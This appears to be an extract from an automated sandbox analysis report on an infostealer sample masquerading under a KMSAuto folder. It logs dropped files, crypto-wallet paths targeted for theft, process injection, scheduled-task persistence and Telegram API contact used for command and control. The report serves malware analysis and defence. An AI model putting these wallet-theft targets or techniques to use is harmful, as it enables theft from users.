            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
            Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q2C:\ProgramData\KMSAuto\031912DB65A63CDAB5\Electrum
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q.C:\ProgramData\KMSAuto\031912DB65A63CDAB5\Jaxx
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q0C:\Users\user\AppData\Roaming\Ethereum\keystore
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q0C:\ProgramData\KMSAuto\031912DB65A63CDAB5\Exodus
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q2C:\ProgramData\KMSAuto\031912DB65A63CDAB5\Ethereum
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.000000000332B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets
            Source: nobtpajdjthawd.exe, 00000001.00000002.1312691830.0000000003357000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q0C:\Users\user\AppData\Roaming\Ethereum\keystore
MITRE ATT&CK Matrix

Columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact.

The matrix table was flattened by extraction and its cell-to-column layout is not recoverable. The technique cells that carried a signature count (number of matching signatures in this report) were:

• Process Injection: 211
• Virtualization/Sandbox Evasion: 41
• Security Software Discovery: 21
• System Information Discovery: 13
• Software Packing: 12
• Obfuscated Files or Information: 11
• Encrypted Channel: 11
• Application Layer Protocol: 3
• File and Directory Discovery: 2
• Non-Application Layer Protocol: 2
• Scripting: 1
• Scheduled Task/Job: 1
• Masquerading: 1
• Disable or Modify Tools: 1
• Timestomp: 1
• Registry Run Keys / Startup Folder: 1
• DLL Side-Loading: 1
• Archive Collected Data: 1
• Data from Local System: 1
• Web Service: 1
• Ingress Tool Transfer: 1
Behavior Graph (ID: 1635473, Sample: nobtpajdjthawd.exe, Startdate: 11/03/2025, Architecture: WINDOWS, Score: 100). The graph image is not present; its nodes and edges, flattened by extraction, are:

• Sample-level signatures: Suricata IDS alerts for network traffic; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 4 other signatures. DNS: api.telegram.org, with the signature "Uses the Telegram API (likely for C&C communication)".
• nobtpajdjthawd.exe (started): Contains functionality to inject code into remote processes; Uses schtasks.exe or at.exe to add and modify task schedules; Injects a PE file into a foreign processes.
  • Child nobtpajdjthawd.exe 16 9 (started): connects to api.telegram.org 149.154.167.220 port 443 (source ports 49718, 49724; TELEGRAMRU, United Kingdom); drops C:\ProgramData\KMSAuto\accc.exe (PE32) and C:\Users\user\...\nobtpajdjthawd.exe.log (ASCII); Found many strings related to Crypto-Wallets (likely being stolen).
    • accc.exe (started): Injects a PE file into a foreign processes; starts accc.exe 1 and WerFault.exe.
    • cmd.exe 1 (started): starts conhost.exe and timeout.exe 1.
    • schtasks.exe 1 (started): starts conhost.exe.
  • Child WerFault.exe 21 16 (started).
• accc.exe (started): Antivirus detection for dropped file; starts accc.exe 14 2 and WerFault.exe.
